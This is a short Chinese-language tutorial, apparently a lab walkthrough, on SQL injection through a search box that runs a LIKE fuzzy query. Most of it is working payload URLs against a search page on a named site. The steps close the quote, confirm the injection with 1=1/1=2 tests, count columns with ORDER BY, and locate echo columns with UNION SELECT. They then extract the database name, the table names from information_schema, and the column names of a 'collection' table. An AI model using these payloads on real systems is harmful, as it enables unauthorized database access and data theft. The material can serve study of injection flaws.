搜索型注入
原理是运用模糊查询:
select * from users where username like '%a%'
1.找到具有模糊查询的搜索框的注入点
2.构造闭合
因为模糊查询的代码是
select * from users where username like '%a%'
所以应该
鱼%’ -- s
判断构造闭合的函数是否正确
鱼%' and 1=1 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=1 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=2 -- s
证明闭合成功
3.查询字段数
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 10 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 5 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 7 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 8 -- s
所以说字段数为7
4.union联合查询,判断回显点
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,2,3,4,5,6,7 -- s
所以说回显点为2和6
5.查询数据库
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,6,7 -- s
6.查询表名
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(table_name) ,7 from information_schema.tables where table_schema="food_db" -- s
7.查询字段
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(column_name) ,7 from information_schema.columns where table_schema="food_db" and table_name="collection" -- s
